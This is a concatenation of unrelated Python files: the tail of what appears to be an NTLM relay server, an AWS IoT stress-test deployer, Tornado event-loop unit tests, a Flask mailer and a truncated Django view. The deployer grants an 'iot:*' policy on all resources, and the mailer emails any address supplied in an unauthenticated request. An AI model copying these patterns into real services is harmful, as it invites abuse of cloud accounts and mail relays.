s.setMode(mode, options.one_shot)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
s.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s.start()
threads.add(s)
print("")
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
if options.socks is True:
s1.shutdown()
for s in threads:
del(s)
sys.exit(1)
else:
pass
|
deploy_agent.py
|
import argparse
import boto3
import configparser
import fileinput
import json
import logging
import os
import psutil
import re
import sys
import time
import uuid
from multiprocessing import Process
from shutil import copyfile
from daemon import Daemon
class DeviceDaemon(Daemon):
def run (self):
os.chdir(os.path.dirname(self.exefile))
os.system('./%s' % os.path.basename(self.exefile))
def run_client(exefile_path):
daemon = DeviceDaemon('/tmp/%s.pid' % os.path.basename(exefile_path), exefile_path)
daemon.start()
def init_config(path):
if os.path.isfile(path):
config = configparser.ConfigParser()
config.read(path)
return config
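# The .ini file is only consumed through config['CREDENTIAL'] and config['IOT'] below.
# A minimal sketch of its assumed layout (section and key names are taken from the lookups
# in this script; every value shown here is a placeholder):
#
#   [CREDENTIAL]
#   awsAccessKeyId = AKIA-PLACEHOLDER
#   awsSecretAccessKey = placeholder-secret
#   region = us-east-1
#
#   [IOT]
#   clientLimit = 10
#   devicePolicy = stressTestPolicy
#   thingGroup = stressTestGroup
#   thingCertDir = /tmp/certs
#   rootCA = ./AmazonRootCA1.pem
#   iotConfigPath = ./aws_iot_config.h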
def init_iot_client(credential):
return boto3.client(
'iot',
aws_access_key_id=credential['awsAccessKeyId'],
aws_secret_access_key=credential['awsSecretAccessKey'],
region_name=credential['region']
)
def build_and_run_client(iotClient, iotConfig):
#create test policy
try:
iotClient.get_policy(
policyName=iotConfig['devicePolicy']
)
except iotClient.exceptions.ResourceNotFoundException as e:
logging.info('Create test policy %s', iotConfig['devicePolicy'])
iotClient.create_policy(
policyName=iotConfig['devicePolicy'],
policyDocument=json.dumps({
'Version': '2012-10-17',
'Statement': [{
'Effect': 'Allow',
'Action': 'iot:*',
'Resource': '*'
}]
})
)
# create test thing group
try:
iotClient.describe_thing_group(thingGroupName=iotConfig['thingGroup'])
except iotClient.exceptions.ResourceNotFoundException as e:
logging.info('Create test thing group %s', iotConfig['thingGroup'])
iotClient.create_thing_group(thingGroupName=iotConfig['thingGroup'])
# create thing
client_id = str(uuid.uuid4())
thing_name = 'stressTest_%s' % client_id
iotClient.create_thing(thingName=thing_name)
iotClient.add_thing_to_thing_group(
thingGroupName=iotConfig['thingGroup'], thingName=thing_name
)
resp = iotClient.create_keys_and_certificate(setAsActive=True)
certificateArn = resp['certificateArn']
thing_cert = '%s/%s.pem.crt' % (iotConfig['thingCertDir'], client_id)
thing_key = '%s/%s.pem.key' % (iotConfig['thingCertDir'], client_id)
with open(thing_cert, 'w') as f:
f.write(resp['certificatePem'])
with open(thing_key, 'w') as f:
f.write(resp['keyPair']['PrivateKey'])
rootCAPath = '%s/%s' % (iotConfig['thingCertDir'], os.path.basename(iotConfig['rootCA']))
copyfile(iotConfig['rootCA'], rootCAPath)
iotClient.attach_thing_principal(
thingName=thing_name,
principal=certificateArn
)
iotClient.attach_policy(
policyName=iotConfig['devicePolicy'],
target=certificateArn
)
endpoint = iotClient.describe_endpoint(endpointType='iot:Data-ATS')['endpointAddress']
# change config
configs_map = {
'AWS_IOT_MQTT_HOST': 'AWS_IOT_MQTT_HOST "%s"' % endpoint,
'AWS_IOT_MQTT_CLIENT_ID': 'AWS_IOT_MQTT_CLIENT_ID "%s"' % client_id,
'AWS_IOT_MY_THING_NAME': 'AWS_IOT_MY_THING_NAME "%s"' % thing_name,
'AWS_IOT_ROOT_CA_FILENAME': 'AWS_IOT_ROOT_CA_FILENAME "%s"' % os.path.basename(rootCAPath),
'AWS_IOT_CERTIFICATE_FILENAME': 'AWS_IOT_CERTIFICATE_FILENAME "%s"' % os.path.basename(thing_cert),
'AWS_IOT_PRIVATE_KEY_FILENAME': 'AWS_IOT_PRIVATE_KEY_FILENAME "%s"' % os.path.basename(thing_key)
}
for line in fileinput.input(iotConfig['iotConfigPath'], inplace=True):
for src, dest in configs_map.items():
if src in line:
line = re.sub(src + '.*', dest, line)
break
sys.stdout.write(line)
# build
work_dir = os.getcwd()
sample_dir = os.path.dirname(iotConfig['iotConfigPath'])
sample_name = os.path.basename(sample_dir)
os.chdir(sample_dir)
os.system('make')
os.rename(sample_name, client_id)
# run
os.chdir(work_dir)
exefile_path = os.path.join(work_dir, sample_dir, client_id)
p = Process(target=run_client, args=(exefile_path,))
p.start()
p.join()
return client_id
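# Tear down every stress-test device: detach and deactivate its certificates,
# delete the thing from the thing group, remove the local credential files and
# executable, and kill any client process that is still running.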
def clean(iotClient, iotConfig, all=True, number=0):
resp = iotClient.list_things_in_thing_group(thingGroupName=iotConfig['thingGroup'])
things = resp['things']
while 'nextToken' in resp:
resp = iotClient.list_things_in_thing_group(
thingGroupName=iotConfig['thingGroup'],
nextToken=resp['nextToken']
)
things.extend(resp['things'])
sample_dir = os.path.dirname(iotConfig['iotConfigPath'])
for thing_name in things:
resp = iotClient.list_thing_principals(
thingName=thing_name
)
certificateIds = []
for principal in resp['principals']:
certificateId = principal.split('/')[-1]
certificateIds.append(certificateId)
iotClient.detach_policy(
policyName=iotConfig['devicePolicy'], target=principal
)
iotClient.update_certificate(
certificateId=certificateId, newStatus='INACTIVE'
)
iotClient.detach_thing_principal(
thingName=thing_name,
principal=principal
)
# wait for detach finish
while True:
resp = iotClient.list_thing_principals(
thingName=thing_name
)
if not resp['principals']:
break
time.sleep(1)
for certificateId in certificateIds:
iotClient.delete_certificate(certificateId=certificateId, forceDelete=True)
iotClient.delete_thing(thingName=thing_name)
client_id = thing_name.split('_', 1)[-1]
try:
os.remove('%s/%s.pem.crt' % (iotConfig['thingCertDir'], client_id))
os.remove('%s/%s.pem.key' % (iotConfig['thingCertDir'], client_id))
os.remove('%s/%s' % (sample_dir, client_id))
except OSError as e:
            logging.warning('Failed to remove device credentials %s', str(e))
for proc in psutil.process_iter():
if proc.name() == client_id:
proc.kill()
pidfile = '/tmp/%s.pid' % client_id
if os.path.exists(pidfile):
os.remove(pidfile)
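# Expected INI layout (inferred from the keys read below):
#   [CREDENTIAL] awsAccessKeyId, awsSecretAccessKey, region
#   [IOT] clientLimit, devicePolicy, thingGroup, thingCertDir, rootCA, iotConfigPath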
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ini", action="store", required=True, dest="ini", help="config file path")
parser.add_argument("-a", "--action", action="store", required=True, dest="action", help="deploy or clean")
parser.add_argument("-n", "--number", action="store", type=int, dest="number", help="number of devices")
args = parser.parse_args()
number = args.number
config = init_config(args.ini)
client_limit = int(config['IOT']['clientLimit'])
if args.action == 'deploy':
if not number:
        msg = 'Need to specify the number of devices to deploy'
logging.error(msg)
raise Exception(msg)
elif number > client_limit:
        msg = 'Exceeded the limit of %d devices; requested %d.' % (client_limit, number)
logging.error(msg)
raise Exception(msg)
iotClient = init_iot_client(config['CREDENTIAL'])
for _ in range(number):
build_and_run_client(iotClient, config['IOT'])
elif args.action == 'clean':
iotClient = init_iot_client(config['CREDENTIAL'])
clean(iotClient, config['IOT'])
|
ioloop_test.py
|
from concurrent.futures import ThreadPoolExecutor
from concurrent import futures
import contextlib
import datetime
import functools
import socket
import subprocess
import sys
import threading
import time
import types
from unittest import mock
import unittest
from tornado.escape import native_str
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError, PeriodicCallback
from tornado.log import app_log
from tornado.testing import AsyncTestCase, bind_unused_port, ExpectLog, gen_test
from tornado.test.util import skipIfNonUnix, skipOnTravis
import typing
if typing.TYPE_CHECKING:
from typing import List # noqa: F401
class TestIOLoop(AsyncTestCase):
def test_add_callback_return_sequence(self):
# A callback returning {} or [] shouldn't spin the CPU, see Issue #1803.
self.calls = 0
loop = self.io_loop
test = self
old_add_callback = loop.add_callback
def add_callback(self, callback, *args, **kwargs):
test.calls += 1
old_add_callback(callback, *args, **kwargs)
loop.add_callback = types.MethodType(add_callback, loop)
loop.add_callback(lambda: {})
loop.add_callback(lambda: [])
loop.add_timeout(datetime.timedelta(milliseconds=50), loop.stop)
loop.start()
self.assertLess(self.calls, 10)
@skipOnTravis
def test_add_callback_wakeup(self):
# Make sure that add_callback from inside a running IOLoop
# wakes up the IOLoop immediately instead of waiting for a timeout.
def callback():
self.called = True
self.stop()
def schedule_callback():
self.called = False
self.io_loop.add_callback(callback)
# Store away the time so we can check if we woke up immediately
self.start_time = time.time()
self.io_loop.add_timeout(self.io_loop.time(), schedule_callback)
self.wait()
self.assertAlmostEqual(time.time(), self.start_time, places=2)
self.assertTrue(self.called)
@skipOnTravis
def test_add_callback_wakeup_other_thread(self):
def target():
# sleep a bit to let the ioloop go into its poll loop
time.sleep(0.01)
self.stop_time = time.time()
self.io_loop.add_callback(self.stop)
thread = threading.Thread(target=target)
self.io_loop.add_callback(thread.start)
self.wait()
delta = time.time() - self.stop_time
self.assertLess(delta, 0.1)
thread.join()
def test_add_timeout_timedelta(self):
self.io_loop.add_timeout(datetime.timedelta(microseconds=1), self.stop)
self.wait()
def test_multiple_add(self):
sock, port = bind_unused_port()
try:
self.io_loop.add_handler(
sock.fileno(), lambda fd, events: None, IOLoop.READ
)
# Attempting to add the same handler twice fails
# (with a platform-dependent exception)
self.assertRaises(
Exception,
self.io_loop.add_handler,
sock.fileno(),
lambda fd, events: None,
IOLoop.READ,
)
finally:
self.io_loop.remove_handler(sock.fileno())
sock.close()
def test_remove_without_add(self):
        # remove_handler should not throw an exception if called on an fd
        # that was never added.
sock, port = bind_unused_port()
try:
self.io_loop.remove_handler(sock.fileno())
finally:
sock.close()
def test_add_callback_from_signal(self):
# cheat a little bit and just run this normally, since we can't
# easily simulate the races that happen with real signal handlers
self.io_loop.add_callback_from_signal(self.stop)
self.wait()
def test_add_callback_from_signal_other_thread(self):
# Very crude test, just to make sure that we cover this case.
# This also happens to be the first test where we run an IOLoop in
# a non-main thread.
other_ioloop = IOLoop()
thread = threading.Thread(target=other_ioloop.start)
thread.start()
other_ioloop.add_callback_from_signal(other_ioloop.stop)
thread.join()
other_ioloop.close()
def test_add_callback_while_closing(self):
# add_callback should not fail if it races with another thread
# closing the IOLoop. The callbacks are dropped silently
# without executing.
closing = threading.Event()
def target():
other_ioloop.add_callback(other_ioloop.stop)
other_ioloop.start()
closing.set()
other_ioloop.close(all_fds=True)
other_ioloop = IOLoop()
thread = threading.Thread(target=target)
thread.start()
closing.wait()
for i in range(1000):
other_ioloop.add_callback(lambda: None)
@skipIfNonUnix # just because socketpair is so convenient
def test_read_while_writeable(self):
# Ensure that write events don't come in while we're waiting for
# a read and haven't asked for writeability. (the reverse is
# difficult to test for)
client, server = socket.socketpair()
try:
def handler(fd, events):
self.assertEqual(events, IOLoop.READ)
self.stop()
self.io_loop.add_handler(client.fileno(), handler, IOLoop.READ)
self.io_loop.add_timeout(
self.io_loop.time() + 0.01, functools.partial(server.send, b"asdf")
)
self.wait()
self.io_loop.remove_handler(client.fileno())
finally:
client.close()
server.close()
def test_remove_timeout_after_fire(self):
# It is not an error to call remove_timeout after it has run.
handle = self.io_loop.add_timeout(self.io_loop.time(), self.stop)
self.wait()
self.io_loop.remove_timeout(handle)
def test_remove_timeout_cleanup(self):
# Add and remove enough callbacks to trigger cleanup.
# Not a very thorough test, but it ensures that the cleanup code
# gets executed and doesn't blow up. This test is only really useful
# on PollIOLoop subclasses, but it should run silently on any
# implementation.
for i in range(2000):
timeout = self.io_loop.add_timeout(self.io_loop.time() + 3600, lambda: None)
self.io_loop.remove_timeout(timeout)
# HACK: wait two IOLoop iterations for the GC to happen.
self.io_loop.add_callback(lambda: self.io_loop.add_callback(self.stop))
self.wait()
def test_remove_timeout_from_timeout(self):
calls = [False, False]
# Schedule several callbacks and wait for them all to come due at once.
# t2 should be cancelled by t1, even though it is already scheduled to
# be run before the ioloop even looks at it.
now = self.io_loop.time()
def t1():
calls[0] = True
self.io_loop.remove_timeout(t2_handle)
self.io_loop.add_timeout(now + 0.01, t1)
def t2():
calls[1] = True
t2_handle = self.io_loop.add_timeout(now + 0.02, t2)
self.io_loop.add_timeout(now + 0.03, self.stop)
time.sleep(0.03)
self.wait()
self.assertEqual(calls, [True, False])
def test_timeout_with_arguments(self):
# This tests that all the timeout methods pass through *args correctly.
results = [] # type: List[int]
self.io_loop.add_timeout(self.io_loop.time(), results.append, 1)
self.io_loop.add_timeout(datetime.timedelta(seconds=0), results.append, 2)
self.io_loop.call_at(self.io_loop.time(), results.append, 3)
self.io_loop.call_later(0, results.append, 4)
self.io_loop.call_later(0, self.stop)
self.wait()
# The asyncio event loop does not guarantee the order of these
# callbacks.
self.assertEqual(sorted(results), [1, 2, 3, 4])
def test_add_timeout_return(self):
# All the timeout methods return non-None handles that can be
# passed to remove_timeout.
handle = self.io_loop.add_timeout(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_at_return(self):
handle = self.io_loop.call_at(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_later_return(self):
handle = self.io_loop.call_later(0, lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_close_file_object(self):
"""When a file object is used instead of a numeric file descriptor,
        the object should be closed (by IOLoop.close(all_fds=True)),
        not just the fd.
"""
# Use a socket since they are supported by IOLoop on all platforms.
# Unfortunately, sockets don't support the .closed attribute for
# inspecting their close status, so we must use a wrapper.
class SocketWrapper(object):
def __init__(self, sockobj):
self.sockobj = sockobj
self.closed = False
def fileno(self):
return self.sockobj.fileno()
def close(self):
self.closed = True
self.sockobj.close()
sockobj, port = bind_unused_port()
socket_wrapper = SocketWrapper(sockobj)
io_loop = IOLoop()
io_loop.add_handler(socket_wrapper, lambda fd, events: None, IOLoop.READ)
io_loop.close(all_fds=True)
self.assertTrue(socket_wrapper.closed)
def test_handler_callback_file_object(self):
"""The handler callback receives the same fd object it passed in."""
server_sock, port = bind_unused_port()
fds = []
def handle_connection(fd, events):
fds.append(fd)
conn, addr = server_sock.accept()
conn.close()
self.stop()
self.io_loop.add_handler(server_sock, handle_connection, IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(("127.0.0.1", port))
self.wait()
self.io_loop.remove_handler(server_sock)
self.io_loop.add_handler(server_sock.fileno(), handle_connection, IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(("127.0.0.1", port))
self.wait()
self.assertIs(fds[0], server_sock)
self.assertEqual(fds[1], server_sock.fileno())
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_mixed_fd_fileobj(self):
server_sock, port = bind_unused_port()
def f(fd, events):
pass
self.io_loop.add_handler(server_sock, f, IOLoop.READ)
with self.assertRaises(Exception):
# The exact error is unspecified - some implementations use
# IOError, others use ValueError.
self.io_loop.add_handler(server_sock.fileno(), f, IOLoop.READ)
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_reentrant(self):
"""Calling start() twice should raise an error, not deadlock."""
returned_from_start = [False]
got_exception = [False]
def callback():
try:
self.io_loop.start()
returned_from_start[0] = True
except Exception:
got_exception[0] = True
self.stop()
self.io_loop.add_callback(callback)
self.wait()
self.assertTrue(got_exception[0])
self.assertFalse(returned_from_start[0])
def test_exception_logging(self):
"""Uncaught exceptions get logged by the IOLoop."""
self.io_loop.add_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_exception_logging_future(self):
"""The IOLoop examines exceptions from Futures and logs them."""
@gen.coroutine
def callback():
self.io_loop.add_callback(self.stop)
1 / 0
self.io_loop.add_callback(callback)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_exception_logging_native_coro(self):
"""The IOLoop examines exceptions from awaitables and logs them."""
async def callback():
# Stop the IOLoop two iterations after raising an exception
# to give the exception time to be logged.
self.io_loop.add_callback(self.io_loop.add_callback, self.stop)
1 / 0
self.io_loop.add_callback(callback)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_spawn_callback(self):
# Both add_callback and spawn_callback run directly on the IOLoop,
# so their errors are logged without stopping the test.
self.io_loop.add_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
# A spawned callback is run directly on the IOLoop, so it will be
# logged without stopping the test.
self.io_loop.spawn_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
@skipIfNonUnix
def test_remove_handler_from_handler(self):
# Create two sockets with simultaneous read events.
client, server = socket.socketpair()
try:
client.send(b"abc")
server.send(b"abc")
# After reading from one fd, remove the other from the IOLoop.
chunks = []
def handle_read(fd, events):
chunks.append(fd.recv(1024))
if fd is client:
self.io_loop.remove_handler(server)
else:
self.io_loop.remove_handler(client)
self.io_loop.add_handler(client, handle_read, self.io_loop.READ)
self.io_loop.add_handler(server, handle_read, self.io_loop.READ)
self.io_loop.call_later(0.1, self.stop)
self.wait()
# Only one fd was read; the other was cleanly removed.
self.assertEqual(chunks, [b"abc"])
finally:
client.close()
server.close()
@gen_test
def test_init_close_race(self):
# Regression test for #2367
def f():
for i in range(10):
loop = IOLoop()
loop.close()
yield gen.multi([self.io_loop.run_in_executor(None, f) for i in range(2)])
# Deliberately not a subclass of AsyncTestCase so the IOLoop isn't
# automatically set as current.
class TestIOLoopCurrent(unittest.TestCase):
def setUp(self):
self.io_loop = None
IOLoop.clear_current()
def tearDown(self):
if self.io_loop is not None:
self.io_loop.close()
def test_default_current(self):
self.io_loop = IOLoop()
# The first IOLoop with default arguments is made current.
self.assertIs(self.io_loop, IOLoop.current())
# A second IOLoop can be created but is not made current.
io_loop2 = IOLoop()
self.assertIs(self.io_loop, IOLoop.current())
io_loop2.close()
def test_non_current(self):
self.io_loop = IOLoop(make_current=False)
# The new IOLoop is not initially made current.
self.assertIsNone(IOLoop.current(instance=False))
# Starting the IOLoop makes it current, and stopping the loop
# makes it non-current. This process is repeatable.
for i in range(3):
def f():
self.current_io_loop = IOLoop.current()
self.io_loop.stop()
self.io_loop.add_callback(f)
self.io_loop.start()
self.assertIs(self.current_io_loop, self.io_loop)
# Now that the loop is stopped, it is no longer current.
self.assertIsNone(IOLoop.current(instance=False))
def test_force_current(self):
self.io_loop = IOLoop(make_current=True)
self.assertIs(self.io_loop, IOLoop.current())
with self.assertRaises(RuntimeError):
# A second make_current=True construction cannot succeed.
IOLoop(make_current=True)
# current() was not affected by the failed construction.
self.assertIs(self.io_loop, IOLoop.current())
class TestIOLoopCurrentAsync(AsyncTestCase):
@gen_test
def test_clear_without_current(self):
# If there is no current IOLoop, clear_current is a no-op (but
# should not fail). Use a thread so we see the threading.Local
# in a pristine state.
with ThreadPoolExecutor(1) as e:
yield e.submit(IOLoop.clear_current)
class TestIOLoopFutures(AsyncTestCase):
def test_add_future_threads(self):
with futures.ThreadPoolExecutor(1) as pool:
def dummy():
pass
self.io_loop.add_future(
pool.submit(dummy), lambda future: self.stop(future)
)
future = self.wait()
self.assertTrue(future.done())
self.assertTrue(future.result() is None)
@gen_test
def test_run_in_executor_gen(self):
event1 = threading.Event()
event2 = threading.Event()
def sync_func(self_event, other_event):
self_event.set()
other_event.wait()
# Note that return value doesn't actually do anything,
# it is just passed through to our final assertion to
# make sure it is passed through properly.
return self_event
# Run two synchronous functions, which would deadlock if not
# run in parallel.
res = yield [
IOLoop.current().run_in_executor(None, sync_func, event1, event2),
IOLoop.current().run_in_executor(None, sync_func, event2, event1),
]
self.assertEqual([event1, event2], res)
@gen_test
def test_run_in_executor_native(self):
event1 = threading.Event()
event2 = threading.Event()
def sync_func(self_event, other_event):
self_event.set()
other_event.wait()
return self_event
# Go through an async wrapper to ensure that the result of
# run_in_executor works with await and not just gen.coroutine
        # (simply passing the underlying concurrent future would do that).
async def async_wrapper(self_event, other_event):
return await IOLoop.current().run_in_executor(
None, sync_func, self_event, other_event
)
res = yield [async_wrapper(event1, event2), async_wrapper(event2, event1)]
self.assertEqual([event1, event2], res)
@gen_test
def test_set_default_executor(self):
count = [0]
class MyExecutor(futures.ThreadPoolExecutor):
def submit(self, func, *args):
count[0] += 1
return super(MyExecutor, self).submit(func, *args)
event = threading.Event()
def sync_func():
event.set()
executor = MyExecutor(1)
loop = IOLoop.current()
loop.set_default_executor(executor)
yield loop.run_in_executor(None, sync_func)
self.assertEqual(1, count[0])
self.assertTrue(event.is_set())
class TestIOLoopRunSync(unittest.TestCase):
def setUp(self):
self.io_loop = IOLoop()
def tearDown(self):
self.io_loop.close()
def test_sync_result(self):
with self.assertRaises(gen.BadYieldError):
self.io_loop.run_sync(lambda: 42)
def test_sync_exception(self):
with self.assertRaises(ZeroDivisionError):
self.io_loop.run_sync(lambda: 1 / 0)
def test_async_result(self):
@gen.coroutine
def f():
yield gen.moment
raise gen.Return(42)
self.assertEqual(self.io_loop.run_sync(f), 42)
def test_async_exception(self):
@gen.coroutine
def f():
yield gen.moment
1 / 0
with self.assertRaises(ZeroDivisionError):
self.io_loop.run_sync(f)
def test_current(self):
def f():
self.assertIs(IOLoop.current(), self.io_loop)
self.io_loop.run_sync(f)
def test_timeout(self):
@gen.coroutine
def f():
yield gen.sleep(1)
self.assertRaises(TimeoutError, self.io_loop.run_sync, f, timeout=0.01)
def test_native_coroutine(self):
@gen.coroutine
def f1():
yield gen.moment
async def f2():
await f1()
self.io_loop.run_sync(f2)
class TestPeriodicCallbackMath(unittest.TestCase):
def simulate_calls(self, pc, durations):
"""Simulate a series of calls to the PeriodicCallback.
Pass a list of call durations in seconds (negative values
work to simulate clock adjustments during the call, or more or
less equivalently, between calls). This method returns the
times at which each call would be made.
"""
calls = []
now = 1000
pc._next_timeout = now
for d in durations:
pc._update_next(now)
calls.append(pc._next_timeout)
now = pc._next_timeout + d
return calls
def dummy(self):
pass
def test_basic(self):
pc = PeriodicCallback(self.dummy, 10000)
self.assertEqual(
self.simulate_calls(pc, [0] * 5), [1010, 1020, 1030, 1040, 1050]
)
def test_overrun(self):
# If a call runs for too long, we skip entire cycles to get
# back on schedule.
call_durations = [9, 9, 10, 11, 20, 20, 35, 35, 0, 0, 0]
expected = [
1010,
1020,
1030, # first 3 calls on schedule
1050,
1070, # next 2 delayed one cycle
1100,
1130, # next 2 delayed 2 cycles
1170,
1210, # next 2 delayed 3 cycles
1220,
1230, # then back on schedule.
]
pc = PeriodicCallback(self.dummy, 10000)
self.assertEqual(self.simulate_calls(pc, call_durations), expected)
def test_clock_backwards(self):
pc = PeriodicCallback(self.dummy, 10000)
# Backwards jumps are ignored, potentially resulting in a
# slightly slow schedule (although we assume that when
# time.time() and time.monotonic() are different, time.time()
# is getting adjusted by NTP and is therefore more accurate)
self.assertEqual(
self.simulate_calls(pc, [-2, -1, -3, -2, 0]), [1010, 1020, 1030, 1040, 1050]
)
# For big jumps, we should perhaps alter the schedule, but we
# don't currently. This trace shows that we run callbacks
# every 10s of time.time(), but the first and second calls are
# 110s of real time apart because the backwards jump is
# ignored.
self.assertEqual(self.simulate_calls(pc, [-100, 0, 0]), [1010, 1020, 1030])
def test_jitter(self):
random_times = [0.5, 1, 0, 0.75]
expected = [1010, 1022.5, 1030, 1041.25]
call_durations = [0] * len(random_times)
pc = PeriodicCallback(self.dummy, 10000, jitter=0.5)
def mock_random():
return random_times.pop(0)
with mock.patch("random.random", mock_random):
self.assertEqual(self.simulate_calls(pc, call_durations), expected)
class TestIOLoopConfiguration(unittest.TestCase):
def run_python(self, *statements):
stmt_list = [
"from tornado.ioloop import IOLoop",
"classname = lambda x: x.__class__.__name__",
] + list(statements)
args = [sys.executable, "-c", "; ".join(stmt_list)]
return native_str(subprocess.check_output(args)).strip()
def test_default(self):
# When asyncio is available, it is used by default.
cls = self.run_python("print(classname(IOLoop.current()))")
self.assertEqual(cls, "AsyncIOMainLoop")
cls = self.run_python("print(classname(IOLoop()))")
self.assertEqual(cls, "AsyncIOLoop")
def test_asyncio(self):
cls = self.run_python(
'IOLoop.configure("tornado.platform.asyncio.AsyncIOLoop")',
"print(classname(IOLoop.current()))",
)
self.assertEqual(cls, "AsyncIOMainLoop")
def test_asyncio_main(self):
cls = self.run_python(
"from tornado.platform.asyncio import AsyncIOMainLoop",
"AsyncIOMainLoop().install()",
"print(classname(IOLoop.current()))",
)
self.assertEqual(cls, "AsyncIOMainLoop")
if __name__ == "__main__":
unittest.main()
|
index.py
|
"""
# coding=utf-8
"""
import os.path
import logging.handlers
from datetime import datetime
from threading import Thread
from flask import Flask, abort, request, jsonify
from flask_mail import Mail, Message
from dotenv import load_dotenv
load_dotenv()
app = Flask(__name__)
KEY_MESSAGE = 'message'
KEY_DATETIME = 'datetime'
KEY_LOCATION = 'location'
KEY_LOCATION_UNKNOWN = 'unknown'
KEY_LOCATION_LATITUDE = 'latitude'
KEY_LOCATION_LONGITUDE = 'longitude'
KEY_LOCATION_ADDRESS = 'address'
SMTP_LOGIN = os.getenv('SMTP_LOGIN', 'user@example.com')
SMTP_FROM = os.getenv('SMTP_FROM', 'User First Name - Last Name')
SMTP_PASSWORD = os.getenv('SMTP_PASSWORD', 'very_secret')
MAIL_SUBJECT = os.getenv('SMTP_MAIL_SUBJECT', 'Mail Subject')
SMTP_SERVER = os.getenv('SMTP_SERVER', 'smtp.example.com')
SMTP_PORT = int(os.getenv('SMTP_PORT', 587))
SMTP_SECURE = os.getenv('SMTP_SECURE', '')
app.config.update(
MAIL_SERVER=SMTP_SERVER,
MAIL_PORT=SMTP_PORT,
MAIL_USE_SSL=SMTP_SECURE == 'ssl',
MAIL_USE_TLS=SMTP_SECURE == 'tls',
MAIL_USERNAME=SMTP_LOGIN,
MAIL_PASSWORD=SMTP_PASSWORD
)
mail = Mail(app)
logs_dir = os.path.join(app.root_path, 'logs')
# create logs dir if needed
if not os.path.isdir(logs_dir):
os.mkdir(logs_dir)
LOG_FILENAME = os.path.join(logs_dir, 'mailer.log')
logger = logging.getLogger("Mailer Logs")
logger.setLevel(logging.INFO)
handler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=5000000, backupCount=5)
logger.addHandler(handler)
# decorator
def a_sync(f: callable) -> callable:
"""
:param f: the function to run
    :return: the wrapper that runs f in a new thread
"""
def wrapper(*args, **kwargs):
"""
:param args: The function args
:param kwargs: The function kwargs
"""
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
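# Functions wrapped with @a_sync run on a fire-and-forget thread; any exception
# they raise happens on that background thread and is not reported to the caller.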
@app.route('/', methods=['GET', 'POST'])
def root():
"""
The one endpoint
:return: http response
"""
if not request.json:
return abort(400)
else:
json_data = request.json
mailto = request.args.get('mailto', None)
log_data = json_data.copy()
log_data['log_datetime'] = str(datetime.now())
logger.info(log_data)
# Send mail
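    # A 'mailto' key in the JSON body takes precedence over the ?mailto= query parameter.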
if 'mailto' in json_data:
mailto = json_data['mailto']
if mailto is not None:
send_email(json_data, mailto)
return jsonify(success=True)
@a_sync
def send_async_email(msg):
"""Background task to send an email with Flask-Mail.
:param Message msg: object containing the subject, the array of recipients, the body and the sender of the mail
"""
with app.app_context():
mail.send(msg)
def get_location_string(location_dict):
"""
    :param dict location_dict: location info that may contain an address and/or coordinates
    :return: a human-readable location string, or None if nothing usable is present
"""
if KEY_LOCATION_ADDRESS in location_dict and \
str(location_dict[KEY_LOCATION_ADDRESS]).lower() != KEY_LOCATION_UNKNOWN:
return str(location_dict[KEY_LOCATION_ADDRESS])
if KEY_LOCATION_LATITUDE in location_dict and KEY_LOCATION_LONGITUDE in location_dict \
and float(location_dict[KEY_LOCATION_LATITUDE]) != 0 and float(location_dict[KEY_LOCATION_LONGITUDE]) != 0:
        return KEY_LOCATION_LATITUDE + ': ' + \
            str(location_dict[KEY_LOCATION_LATITUDE]) + \
            ', ' + KEY_LOCATION_LONGITUDE + ': ' + \
            str(location_dict[KEY_LOCATION_LONGITUDE])
return None
def get_mail_body(posted_data):
"""
:param Dict posted_data:
:return String mail_body: the string in readable format to be used as mail body
"""
json_data = posted_data
# Backwards compatibility
if 'data' in posted_data:
json_data = posted_data['data']
mail_body = 'Details: \nDatetime: '
if KEY_DATETIME in json_data:
mail_body += str(json_data[KEY_DATETIME])
else:
mail_body += str(datetime.now())
mail_body += ',\nLocation: '
if KEY_LOCATION in json_data:
location_string = get_location_string(json_data[KEY_LOCATION])
mail_body += location_string if location_string is not None and len(location_string) > 1 else 'Unknown'
else:
mail_body += 'Unknown'
mail_body += '\nMessage: '
if KEY_MESSAGE in json_data:
mail_body += '"' + json_data[KEY_MESSAGE] + '"'
return mail_body
def send_email(json_data, to):
"""Prepares a mail Message to be sent as a background task with Flask-Mail
:param to: list[str] the list of recipients
:param dict json_data: The dictionary that has info for the mail
"""
if not isinstance(to, list):
to = [to]
msg = Message(subject=MAIL_SUBJECT,
recipients=to,
body=get_mail_body(json_data),
                  sender=SMTP_FROM + ' <' + SMTP_LOGIN + '>')
send_async_email(msg)
if __name__ == '__main__':
app.run(host='0.0.0.0')
|
views.py
|
import requests
from threading import Thread
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from node.models import Node
@login_required
def home(request):
nodes = Node.objects.all()
def thread_func(node):
try:
# For production add the timeout argument to ensure that the
# request below won't stay hanging for a response.
# e.g. requests.get(<address>, timeout=<time_in_seconds>)
response = requests.get(f'http://{node.IP}:{node.PORT}/api/get_id')
node.status = 'Online'
